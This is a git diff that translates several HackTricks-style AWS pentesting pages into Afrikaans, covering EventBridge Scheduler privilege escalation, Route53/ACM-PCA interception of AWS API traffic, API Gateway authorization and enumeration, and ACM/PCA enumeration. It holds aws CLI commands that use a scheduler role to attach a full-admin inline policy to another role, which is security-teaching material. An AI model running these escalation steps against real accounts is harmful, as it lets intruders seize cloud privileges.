@@ -12,42 +12,34 @@ More info EventBridge Scheduler in:
 
 ### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)
 
-An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action
-
-For example, they could configure the schedule to **invoke a Lambda function** which is a templated action:
+'n Aanvaller met daardie toestemmings sal in staat wees om **`te skep`|`op te dateer` 'n skedule en die toestemmings van die skedule rol** wat daaraan geheg is, te misbruik om enige aksie uit te voer.
 
+Byvoorbeeld, hulle kan die skedule konfigureer om **'n Lambda-funksie aan te roep** wat 'n sjabloon aksie is:
 ```bash
 aws scheduler create-schedule \
-    --name MyLambdaSchedule \
-    --schedule-expression "rate(5 minutes)" \
-    --flexible-time-window "Mode=OFF" \
-    --target '{
-        "Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
-        "RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
-    }'
+--name MyLambdaSchedule \
+--schedule-expression "rate(5 minutes)" \
+--flexible-time-window "Mode=OFF" \
+--target '{
+"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
+"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
+}'
 ```
-
-In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy:
-
+In addision tot templated diens aksies, kan jy **universal targets** in EventBridge Scheduler gebruik om 'n wye reeks API operasies vir baie AWS dienste aan te roep. Universal targets bied buigsaamheid om byna enige API aan te roep. Een voorbeeld kan wees om universal targets te gebruik om "**AdminAccessPolicy**" toe te voeg, met 'n rol wat die "**putRolePolicy**" beleid het:
 ```bash
 aws scheduler create-schedule \
-    --name GrantAdminToTargetRoleSchedule \
-    --schedule-expression "rate(5 minutes)" \
-    --flexible-time-window "Mode=OFF" \
-    --target '{
-        "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
-        "RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
-        "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
-    }'
+--name GrantAdminToTargetRoleSchedule \
+--schedule-expression "rate(5 minutes)" \
+--flexible-time-window "Mode=OFF" \
+--target '{
+"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
+"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
+"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
+}'
 ```
-
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html)
 - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
index fc3563ce7..3a588cffa 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
@@ -2,7 +2,7 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-For more information about Route53 check:
+Vir meer inligting oor Route53, kyk:
 
 {{#ref}}
 ../aws-services/aws-route53-enum.md
@@ -11,26 +11,22 @@ For more information about Route53 check:
 ### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate`
 
 > [!NOTE]
-> To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic.
+> Om hierdie aanval uit te voer, moet die teikenrekening reeds 'n [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** in die rekening opgestel hê, en EC2-instanties in die VPC(s) moet reeds die sertifikate ingevoer het om dit te vertrou. Met hierdie infrastruktuur in plek, kan die volgende aanval uitgevoer word om AWS API-verkeer te onderskep.
 
-Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs`
+Ander toestemmings **aanbeveel maar nie vereis vir die enumerasie** deel: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs`
 
-Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions.
+Aneem daar is 'n AWS VPC met verskeie cloud-native toepassings wat met mekaar en met AWS API kommunikeer. Aangesien die kommunikasie tussen die mikrodiens dikwels TLS-geënkripteer is, moet daar 'n private CA wees om die geldige sertifikate vir daardie dienste uit te reik. **As ACM-PCA gebruik word** daarvoor en die teenstander daarin slaag om **toegang te verkry om beide route53 en acm-pca private CA te beheer** met die minimum stel toestemmings hierbo beskryf, kan dit **die toepassingsoproepe na AWS API oorneem** en hul IAM-toestemmings oorneem.
 
-This is possible because:
+Dit is moontlik omdat:
 
-- AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning)
-- Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names
-- Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names
+- AWS SDK's het nie [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) nie
+- Route53 laat die skep van Private Hosted Zone en DNS-rekords vir AWS API-domeinnames toe
+- Private CA in ACM-PCA kan nie beperk word tot die ondertekening van sertifikate slegs vir spesifieke Algemene Name nie
 
-**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
+**Potensiële Impak:** Indirekte privesc deur die onderskepping van sensitiewe inligting in die verkeer.
 
-#### Exploitation <a href="#discovery" id="discovery"></a>
+#### Exploitatie <a href="#discovery" id="discovery"></a>
 
-Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/)
+Vind die eksploitasiestappe in die oorspronklike navorsing: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/README.md b/src/pentesting-cloud/aws-security/aws-services/README.md
index dddd8ac04..f62b35238 100644
--- a/src/pentesting-cloud/aws-security/aws-services/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/README.md
@@ -1,35 +1,31 @@
-# AWS - Services
+# AWS - Dienste
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Types of services
+## Tipes dienste
 
-### Container services
+### Houer dienste
 
-Services that fall under container services have the following characteristics:
+Dienste wat onder houer dienste val, het die volgende eienskappe:
 
-- The service itself runs on **separate infrastructure instances**, such as EC2.
-- **AWS** is responsible for **managing the operating system and the platform**.
-- A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**.
-- As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**.
-- Also, platform-level identity and access management where it exists.
-- **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
+- Die diens self loop op **afsonderlike infrastruktuur instansies**, soos EC2.
+- **AWS** is verantwoordelik vir **die bestuur van die bedryfstelsel en die platform**.
+- 'n Gemanagte diens word deur AWS verskaf, wat tipies die diens self is vir die **werklike aansoek wat as houers gesien word**.
+- As 'n gebruiker van hierdie houer dienste, het jy 'n aantal bestuur en sekuriteit verantwoordelikhede, insluitend **die bestuur van netwerktoegang sekuriteit, soos netwerktoegangbeheerlys reëls en enige vuurmure**.
+- Ook, platform-vlak identiteit en toegang bestuur waar dit bestaan.
+- **Voorbeelde** van AWS houer dienste sluit Relational Database Service, Elastic Mapreduce, en Elastic Beanstalk in.
 
-### Abstract Services
+### Abstrakte Dienste
 
-- These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
-- The services are accessed via endpoints using AWS application programming interfaces, APIs.
-- The **underlying infrastructure, operating system, and platform is managed by AWS**.
-- The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared.
-- **Data is isolated via security mechanisms**.
-- Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
+- Hierdie dienste is **verwyder, geabstraheer, van die platform of bestuurslaag waarop wolk aansoeke gebou is**.
+- Die dienste word via eindpunte toeganklik gemaak deur gebruik te maak van AWS aansoekprogrammering interfaces, APIs.
+- Die **onderliggende infrastruktuur, bedryfstelsel, en platform word deur AWS bestuur**.
+- Die geabstraheerde dienste bied 'n multi-huur platform waarop die onderliggende infrastruktuur gedeel word.
+- **Data is geïsoleer deur middel van sekuriteitsmeganismes**.
+- Abstrakte dienste het 'n sterk integrasie met IAM, en **voorbeelde** van abstrakte dienste sluit S3, DynamoDB, Amazon Glacier, en SQS in.
 
-## Services Enumeration
+## Dienste Enumerasie
 
-**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.**
+**Die bladsye van hierdie afdeling is georden volgens AWS diens. Daarin sal jy inligting oor die diens (hoe dit werk en vermoëns) vind wat jou sal toelaat om voorregte te verhoog.**
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
index 09aa42d7c..aa60f5255 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
@@ -4,40 +4,39 @@
 
 ## API Gateway
 
-### Basic Information
+### Basiese Inligting
 
-AWS API Gateway is a comprehensive service offered by Amazon Web Services (AWS) designed for developers to **create, publish, and oversee APIs on a large scale**. It functions as an entry point to an application, permitting developers to establish a framework of rules and procedures. This framework governs the access external users have to certain data or functionalities within the application.
+AWS API Gateway is 'n omvattende diens wat deur Amazon Web Services (AWS) aangebied word, ontwerp vir ontwikkelaars om **API's op 'n groot skaal te skep, te publiseer en te bestuur**. Dit funksioneer as 'n toegangspunt tot 'n toepassing, wat ontwikkelaars toelaat om 'n raamwerk van reëls en prosedures op te stel. Hierdie raamwerk regeer die toegang wat eksterne gebruikers tot sekere data of funksies binne die toepassing het.
 
-API Gateway enables you to define **how requests to your APIs should be handled**, and it can create custom API endpoints with specific methods (e.g., GET, POST, PUT, DELETE) and resources. It can also generate client SDKs (Software Development Kits) to make it easier for developers to call your APIs from their applications.
+API Gateway stel jou in staat om **te definieer hoe versoeke na jou API's hanteer moet word**, en dit kan pasgemaakte API-eindpunte met spesifieke metodes (bv. GET, POST, PUT, DELETE) en hulpbronne skep. Dit kan ook kliënt SDK's (Software Development Kits) genereer om dit vir ontwikkelaars makliker te maak om jou API's vanuit hul toepassings aan te roep.
 
-### API Gateways Types
+### API Gateway Tipes
 
-- **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends.
-- **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services.
-- **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services.
-- **REST API Private**: Create a REST API that is only accessible from within a VPC.
+- **HTTP API**: Bou lae-latensie en koste-effektiewe REST API's met ingeboude funksies soos OIDC en OAuth2, en inheemse CORS-ondersteuning. Werk met die volgende: Lambda, HTTP agtergronde.
+- **WebSocket API**: Bou 'n WebSocket API met volgehoue verbindings vir regte tyd gebruiksgevalle soos klets toepassings of dashboards. Werk met die volgende: Lambda, HTTP, AWS Dienste.
+- **REST API**: Ontwikkel 'n REST API waar jy volledige beheer oor die versoek en antwoord het, saam met API bestuur vermoëns. Werk met die volgende: Lambda, HTTP, AWS Dienste.
+- **REST API Privaat**: Skep 'n REST API wat slegs vanaf binne 'n VPC toeganklik is.
 
-### API Gateway Main Components
+### API Gateway Hoofkomponente
 
-1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}.
-2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage.
-   - The stage is indicated at the beggining of the URL of the API Gateway endpoint.
-3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**.
-4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API.
-   - In order to make effect the API needs to be **deployed again after** the resource policy is modified.
+1. **Hulpbronne**: In API Gateway is hulpbronne die komponente wat **die struktuur van jou API vorm**. Hulle verteenwoordig **die verskillende paaie of eindpunte** van jou API en ooreen met die verskillende aksies wat jou API ondersteun. 'n Hulpbron is elke metode (bv. GET, POST, PUT, DELETE) **binne elke pad** (/, of /users, of /user/{id}).
+2. **Fases**: Fases in API Gateway verteenwoordig **verskillende weergawes of omgewings** van jou API, soos ontwikkeling, staging, of produksie. Jy kan fases gebruik om **meervoudige weergawes van jou API gelyktydig te bestuur en te ontplooi**, wat jou toelaat om nuwe funksies of foutoplossings te toets sonder om die produksie-omgewing te beïnvloed. Fases ondersteun ook **fase veranderlikes**, wat sleutel-waarde pare is wat gebruik kan word om die gedrag van jou API op grond van die huidige fase te konfigureer. Byvoorbeeld, jy kan fase veranderlikes gebruik om API versoeke na verskillende Lambda funksies of ander agtergrond dienste te lei, afhangende van die fase.
+- Die fase word aan die begin van die URL van die API Gateway eindpunt aangedui.
+3. **Outoriseerders**: Outoriseerders in API Gateway is verantwoordelik vir **die beheer van toegang tot jou API** deur die identiteit van die oproeper te verifieer voordat die versoek voortgaan. Jy kan **AWS Lambda funksies** as pasgemaakte outoriseerders gebruik, wat jou toelaat om jou eie autentisering en outorisering logika te implementeer. Wanneer 'n versoek inkom, stuur API Gateway die versoek se outoriseringstoken na die Lambda outoriseerder, wat die token verwerk en 'n IAM-beleid teruggee wat bepaal watter aksies die oproeper mag uitvoer. API Gateway ondersteun ook **ingeboude outoriseerders**, soos **AWS Identiteit en Toegang Bestuur (IAM)** en **Amazon Cognito**.
+4. **Hulpbronbeleid**: 'n Hulpbronbeleid in API Gateway is 'n JSON-dokument wat **die toestemmings vir toegang tot jou API definieer**. Dit is soortgelyk aan 'n IAM-beleid, maar spesifiek aangepas vir API Gateway. Jy kan 'n hulpbronbeleid gebruik om te beheer wie jou API kan toegang, watter metodes hulle kan aanroep, en vanaf watter IP adresse of VPC's hulle kan aansluit. **Hulpbronbeleide kan in kombinasie met outoriseerders gebruik word** om fyngegradeerde toegangbeheer vir jou API te bied.
+- Om effektief te wees, moet die API **weer ontplooi word nadat** die hulpbronbeleid gewysig is.
 
 ### Logging
 
-By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and **X-Ray tracing** is also **off**.
+Standaard is **CloudWatch Logs** **af**, **Toegang Logging** is **af**, en **X-Ray opsporing** is ook **af**.
 
-### Enumeration
+### Enumerasie
 
 > [!TIP]
-> Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.**
+> Let daarop dat in beide AWS API's om hulpbronne te enumereer (**`apigateway`** en **`apigatewayv2`**) die enigste toestemming wat jy nodig het en die enigste lees toestemming wat gegee kan word is **`apigateway:GET`**, met dit kan jy **alles enumereer.**
 
 {{#tabs }}
 {{#tab name="apigateway" }}
-
 ```bash
 # Generic info
 aws apigateway get-account
@@ -78,11 +77,9 @@ aws apigateway get-usage-plan-key --usage-plan-id <plan_id> --key-id <key_id>
 ###Already consumed
 aws apigateway get-usage --usage-plan-id <plan_id> --start-date 2023-07-01 --end-date 2023-07-12
 ```
-
 {{#endtab }}
 
 {{#tab name="apigatewayv2" }}
-
 ```bash
 # Generic info
 aws apigatewayv2 get-domain-names
@@ -124,49 +121,43 @@ aws apigatewayv2 get-models --api-id <id>
 ## Call API
 https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-## Different Authorizations to access API Gateway endpoints
+## Verskillende Owerhede om toegang tot API Gateway eindpunte te verkry
 
-### Resource Policy
+### Hulpbronbeleid
 
-It's possible to use resource policies to define who could call the API endpoints.\
-In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET.
+Dit is moontlik om hulpbronbeleide te gebruik om te definieer wie die API eindpunte kan bel.\
+In die volgende voorbeeld kan jy sien dat die **aangegeven IP nie kan bel nie** die eindpunt `/resource_policy` via GET.
 
 <figure><img src="../../../images/image (256).png" alt=""><figcaption></figcaption></figure>
 
-### IAM Authorizer
+### IAM Owerhede
 
-It's possible to set that a methods inside a path (a resource) requires IAM authentication to call it.
+Dit is moontlik om te stel dat 'n metode binne 'n pad (n hulpbron) IAM-sertifisering benodig om dit te bel.
 
 <figure><img src="https://lh3.googleusercontent.com/GGx-kfqNXu6zMqGidnO8_eR88fYPpJG-wNuBBnedAJntiRUEPTEScl7OvWthGYRiI_msYCdC6oBFvJc827Tb4-4UogxpOyrEXyst-8IDzP9DC2NOtXSY7w58L0baCAcBQjSyvBhJREvWWCtiboNYPSKuEw=s2048" alt=""><figcaption></figcaption></figure>
 
-When this is set you will receive the error `{"message":"Missing Authentication Token"}` when you try to reach the endpoint without any authorization.
-
-One easy way to generate the expected token by the application is to use **curl**.
+Wanneer dit gestel is, sal jy die fout `{"message":"Missing Authentication Token"}` ontvang wanneer jy probeer om die eindpunt te bereik sonder enige owerheid.
 
+Een maklike manier om die verwagte token deur die toepassing te genereer, is om **curl** te gebruik.
 ```bash
 $ curl -X <method> https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource> --user <AWS_ACCESS_KEY>:<AWS_SECRET_KEY> --aws-sigv4 "aws:amz:<region>:execute-api"
 ```
-
-Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**.
+Nog 'n manier is om die **`Authorization`** tipe **`AWS Signature`** binne **Postman** te gebruik.
 
 <figure><img src="../../../images/image (168).png" alt=""><figcaption></figcaption></figure>
 
-Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint.
-
-Both methods will generate an **Authorization** **header** such as:
+Stel die accessKey en die SecretKey van die rekening wat jy wil gebruik in, en jy kan nou teen die API-eindpunt autentiseer.
 
+Albei metodes sal 'n **Authorization** **header** genereer soos:
 ```
 AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date, Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c71b4bc62a5c2
 ```
+Let op dat in ander gevalle die **Authorizer** dalk **sleg gekodeer** is en net **enigiets** binne die **Authorization header** sal **toelaat om die versteekte inhoud** te sien.
 
-Note that in other cases the **Authorizer** might have been **bad coded** and just sending **anything** inside the **Authorization header** will **allow to see the hidden content**.
-
-### Request Signing Using Python
-
+### Versoekondertekening met Python
 ```python
 
 pip install requests
@@ -193,86 +184,83 @@ response = requests.get(url, auth=awsauth)
 print(response.text)
 
 ```
-
 ### Custom Lambda Authorizer
 
-It's possible to use a lambda that based in a given token will **return an IAM policy** indicating if the user is **authorized to call the API endpoint**.\
-You can set each resource method that will be using the authoriser.
+Dit is moontlik om 'n lambda te gebruik wat op 'n gegewe token gebaseer is en **'n IAM-beleid** sal **teruggee wat aandui of die gebruiker **gemagtig is om die API-eindpunt** aan te roep.\
+Jy kan elke hulpbronmetode instel wat die outeur gaan gebruik.
 
 <details>
 
 <summary>Lambda Authorizer Code Example</summary>
-
 ```python
 import json
 
 def lambda_handler(event, context):
-    token = event['authorizationToken']
-    method_arn = event['methodArn']
+token = event['authorizationToken']
+method_arn = event['methodArn']
 
-    if not token:
-        return {
-            'statusCode': 401,
-            'body': 'Unauthorized'
-        }
+if not token:
+return {
+'statusCode': 401,
+'body': 'Unauthorized'
+}
 
-    try:
-        # Replace this with your own token validation logic
-        if token == "your-secret-token":
-            return generate_policy('user', 'Allow', method_arn)
-        else:
-            return generate_policy('user', 'Deny', method_arn)
-    except Exception as e:
-        print(e)
-        return {
-            'statusCode': 500,
-            'body': 'Internal Server Error'
-        }
+try:
+# Replace this with your own token validation logic
+if token == "your-secret-token":
+return generate_policy('user', 'Allow', method_arn)
+else:
+return generate_policy('user', 'Deny', method_arn)
+except Exception as e:
+print(e)
+return {
+'statusCode': 500,
+'body': 'Internal Server Error'
+}
 
 def generate_policy(principal_id, effect, resource):
-    policy = {
-        'principalId': principal_id,
-        'policyDocument': {
-            'Version': '2012-10-17',
-            'Statement': [
-                {
-                    'Action': 'execute-api:Invoke',
-                    'Effect': effect,
-                    'Resource': resource
-                }
-            ]
-        }
-    }
-    return policy
+policy = {
+'principalId': principal_id,
+'policyDocument': {
+'Version': '2012-10-17',
+'Statement': [
+{
+'Action': 'execute-api:Invoke',
+'Effect': effect,
+'Resource': resource
+}
+]
+}
+}
+return policy
 ```
-
 </details>
 
-Call it with something like:
+Noem dit met iets soos:
 
 <pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>curl "https://jhhqafgh6f.execute-api.eu-west-1.amazonaws.com/prod/custom_auth" -H 'Authorization: your-secret-token'
 </strong></code></pre>
 
 > [!WARNING]
-> Depending on the Lambda code, this authorization might be vulnerable
+> Afhangende van die Lambda-kode, mag hierdie toestemming kwesbaar wees
 
-Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}`
+Let daarop dat as 'n **weieringsbeleid gegenereer en teruggestuur word**, die fout wat deur API Gateway teruggestuur word is: `{"Message":"User is not authorized to access this resource with an explicit deny"}`
 
-This way you could **identify this authorization** being in place.
+Op hierdie manier kan jy **identifiseer dat hierdie toestemming** in plek is.
 
-### Required API Key
+### Vereiste API Sleutel
 
-It's possible to set API endpoints that **require a valid API key** to contact it.
+Dit is moontlik om API-eindpunte in te stel wat **'n geldige API-sleutel vereis** om dit te kontak.
 
 <figure><img src="../../../images/image (88).png" alt=""><figcaption></figcaption></figure>
 
-It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month).
+Dit is moontlik om API-sleutels in die API Gateway-portaal te genereer en selfs in te stel hoeveel dit gebruik kan word (in terme van versoeke per sekonde en in terme van versoeke per maand).
 
-To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key:
+Om 'n API-sleutel te laat werk, moet jy dit by 'n **Gebruik Plan** voeg, hierdie gebruiksplan moet by die **API Stadium** gevoeg word en die geassosieerde API-stadium moet 'n **metode-beperking** geconfigureer hê vir die **eindpunt** wat die API-sleutel vereis:
 
 <figure><img src="../../../images/image (198).png" alt=""><figcaption></figcaption></figure>
 
-## Unauthenticated Access
+## Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
@@ -284,20 +272,16 @@ To make an API key work, you need to add it to a **Usage Plan**, this usage plan
 ../aws-privilege-escalation/aws-apigateway-privesc.md
 {{#endref}}
 
-## Post Exploitation
+## Post Exploitatie
 
 {{#ref}}
 ../aws-post-exploitation/aws-api-gateway-post-exploitation.md
 {{#endref}}
 
-## Persistence
+## Volharding
 
 {{#ref}}
 ../aws-persistence/aws-api-gateway-persistence.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
index 0f3da9d50..7264b65ae 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
@@ -2,18 +2,17 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**.
+**AWS Certificate Manager (ACM)** word aangebied as 'n diens wat daarop gemik is om die **verskaffing, bestuur en implementering van SSL/TLS sertifikate** vir AWS dienste en interne hulpbronne te vereenvoudig. Die noodsaaklikheid vir handmatige prosesse, soos die aankoop, opgelaai, en sertifikaat hernuwing, word **verwyder** deur ACM. Dit stel gebruikers in staat om doeltreffend sertifikate aan te vra en te implementeer op verskeie AWS hulpbronne, insluitend **Elastic Load Balancers, Amazon CloudFront verspreidings, en API's op API Gateway**.
 
-A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services.
+'n Sleutelkenmerk van ACM is die **outomatiese hernuwing van sertifikate**, wat die bestuurslas aansienlik verminder. Verder ondersteun ACM die skepping en gesentraliseerde bestuur van **privaat sertifikate vir interne gebruik**. Alhoewel SSL/TLS sertifikate vir geïntegreerde AWS dienste soos Elastic Load Balancing, Amazon CloudFront, en Amazon API Gateway gratis deur ACM aangebied word, is gebruikers verantwoordelik vir die koste verbonde aan die AWS hulpbronne wat deur hul toepassings gebruik word en 'n maandelikse fooi vir elke **privaat Certificate Authority (CA)** en private sertifikate wat buite geïntegreerde ACM dienste gebruik word.
 
-**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization.
+**AWS Private Certificate Authority** word aangebied as 'n **bestuurde private CA diens**, wat ACM se vermoëns verbeter deur sertifikaatbestuur uit te brei om privaat sertifikate in te sluit. Hierdie private sertifikate is noodsaaklik vir die autentisering van hulpbronne binne 'n organisasie.
 
-## Enumeration
+## Enumerasie
 
 ### ACM
-
 ```bash
 # List certificates
 aws acm list-certificates
@@ -27,9 +26,7 @@ aws acm get-certificate --certificate-arn "arn:aws:acm:us-east-1:188868097724:ce
 # Account configuration
 aws acm get-account-configuration
 ```
-
 ### PCM
-
 ```bash
 # List CAs
 aws acm-pca list-certificate-authorities
@@ -49,7 +46,6 @@ aws acm-pca get-certificate-authority-csr --certificate-authority-arn <arn>
 # Get CA Policy (if any)
 aws acm-pca get-policy --resource-arn <arn>
 ```
-
 ## Privesc
 
 TODO
@@ -59,7 +55,3 @@ TODO
 TODO
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
